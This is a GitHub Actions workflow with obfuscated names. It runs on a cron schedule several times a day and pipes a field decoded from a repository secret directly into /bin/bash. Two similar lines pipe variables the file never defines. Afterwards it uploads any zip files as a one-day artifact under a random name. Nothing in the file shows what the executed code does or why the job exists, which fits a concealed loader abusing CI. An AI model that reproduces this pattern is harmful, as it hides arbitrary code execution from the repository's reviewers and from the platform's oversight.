name: averydata141
on:
  workflow_dispatch:

  schedule:
    - cron: '37 3,9,15,21 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: averydata141
        env:
          ifx45: ${{ secrets.ifx45 }}
        run: |
          printf '%s' "$ifx45" | jq -r .nc66753 | /bin/bash
          printf '%s' "$nituz0207" | jq -r .ixt1 | /bin/bash
          printf '%s' "$osr8" | jq -r .diz351 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: HMqsaL0S
          path: "*.zip"
          retention-days: 1
